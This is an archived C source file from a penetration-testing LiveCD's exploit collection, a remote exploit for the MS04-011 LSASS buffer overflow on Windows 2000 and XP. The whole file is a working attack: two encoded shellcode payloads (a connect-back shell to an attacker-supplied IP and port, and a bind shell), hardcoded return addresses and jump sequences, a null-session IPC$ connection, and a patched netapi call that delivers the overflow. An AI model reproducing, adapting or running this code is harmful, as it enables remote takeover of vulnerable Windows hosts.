home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / ms04011lsass.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  6KB  |  207 lines

---

1.  // Comments from K-OTik.COM : to make this exploit work remotely you have to use the
2. // sbaaNetapi.dll wich modifies the DsRoleUpgradeDownlevelServer API, this will allow
3. // the remote host to be specified as explained on eeye advisory...
4. //
5. // http://www.k-otik.com/exploits/04252004.ms04011lsass.rar
6.  
7.  
8. #include <windows.h>
9. #pragma comment(lib,"mpr.lib")
10. #pragma comment(lib, "ws2_32")
11.  
12. unsigned char scode[] =
13. "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
14. "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
15.  
16. "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
17. "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
18. "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
19. "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
20. "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
21. "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
22. "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
23. "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
24. "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
25. "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
26. "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
27. "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
28. "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
29. "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
30. "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
31. "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
32. "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
33. "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
34. "\xF9\x7E\xE0\x5F\xE0";
35.  
36.  
37.  
38. unsigned char scode2[] =
39. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
40. "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
41.  
42. "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
43. "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
44. "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
45. "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
46. "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
47. "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
48. "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
49. "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
50. "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
51. "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
52. "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
53. "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
54. "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
55. "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
56. "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
57. "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
58. "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
59. "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
60. "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
61. "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
62. "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
63. "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
64. "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
65. "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
66.  
67.  
68.  
69. typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
70. (unsigned long, unsigned long, unsigned long, unsigned long,
71. unsigned long, unsigned long, unsigned long, unsigned long,
72. unsigned long, unsigned long, unsigned long, unsigned long);
73. DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
74.  
75. #define LEN 3500
76.  
77. char buf[LEN+1];
78. char sendbuf[(LEN+1)*2];
79. char buf2[2];
80. char target2[200];
81.  
82. int main(int argc, char *argv[])
83. {
84. HMODULE hNetapi;
85. int ret=0;
86. int i;
87. char c, *target;
88. LPSTR hostipc[40];
89. NETRESOURCE netResource;
90. unsigned short port;
91. unsigned long ip;
92. unsigned char* sc;
93.  
94. if (argc < 3) {
95. printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \
96. code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \
97. Usage: \n \
98. %s 0 targetip (Port ConnectBackIP ) \
99. ----> attack 2k (tested on cn sp4,en sp4)\n \
100. %s 1 targetip (Port ConnectBackIP ) \
101. ----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
102. printf("");
103. return 0;
104. }
105.  
106. target = argv[2];
107. sprintf((char *)hostipc,"\\\\%s\\ipc$",target);
108.  
109. netResource.lpLocalName = NULL;
110. netResource.lpProvider = NULL;
111. netResource.dwType = RESOURCETYPE_ANY;
112. netResource.lpRemoteName=(char *)hostipc;
113.  
114.  
115.  
116. ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
117. if (ret != 0)
118. {
119. printf("Create NULL session failed\n");
120. // return 1;
121. }
122.  
123.  
124. hNetapi = LoadLibrary("sbaaNetapi.dll");
125. if (!hNetapi) {
126. printf("Can't load sbaaNetapi.dll.\n");
127. exit(0);
128. }
129.  
130. (DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
131.  
132. if (!DsRoleUpgradeDownlevelServer) {
133. printf("Can't find function.\n");
134. exit(0);
135. }
136.  
137. memset(buf, '\x90', LEN);
138.  
139.  
140.  
141. if(argc>4)
142. {
143.  
144. port = htons(atoi(argv[3]))^(USHORT)0x9999;
145. ip = inet_addr(argv[4])^(ULONG)0x99999999;
146.  
147. memcpy(&scode[118], &port, 2);
148. memcpy(&scode[111], &ip, 4);
149. sc=scode;
150. }
151. else
152. {
153. if(argc>3)
154. {
155. port = htons(atoi(argv[3]))^(USHORT)0x9999;
156. memcpy(&scode2[176], &port, 2);
157.  
158. }
159. sc=scode2;
160. }
161. //attack all 2k sp3 version
162.  
163. memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
164. memcpy(&buf[2036], sc, strlen(sc));
165.  
166. //attack all 2k sp4 version
167. memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
168. memcpy(&buf[2844],"\x2b\x38\x03\x78",4);
169.  
170. memcpy(&buf[2856], sc, strlen(sc));
171.  
172.  
173. printf("shellcode size %d\n", strlen(sc));
174.  
175.  
176. for(i=0; i<LEN; i++) { //unicode
177. sendbuf[i*2] = buf[i];
178. sendbuf[i*2+1] = 0;
179. }
180. sendbuf[LEN*2]=0;
181. sendbuf[LEN*2+1]=0;
182.  
183. if(atoi(argv[1])==1)
184. {
185. memcpy(&sendbuf, sc, strlen(sc));
186. memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
187. memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
188. memcpy(&sendbuf[1980], "\xeb\xde",2);
189. }
190. memset(target2, 0, 100);
191. for(i=0; i<strlen(target); i++) {
192. target2[i*2] = target[i];
193. target2[i*2+1] = 0;
194. }
195. memset(buf2, 0, 2);
196. ret=0;
197. ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
198. &buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);
199.  
200. printf("Ret value = %d\n",ret);
201. WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
202. FreeLibrary(hNetapi);
203.  
204. return 0;
205. }
206.  
207.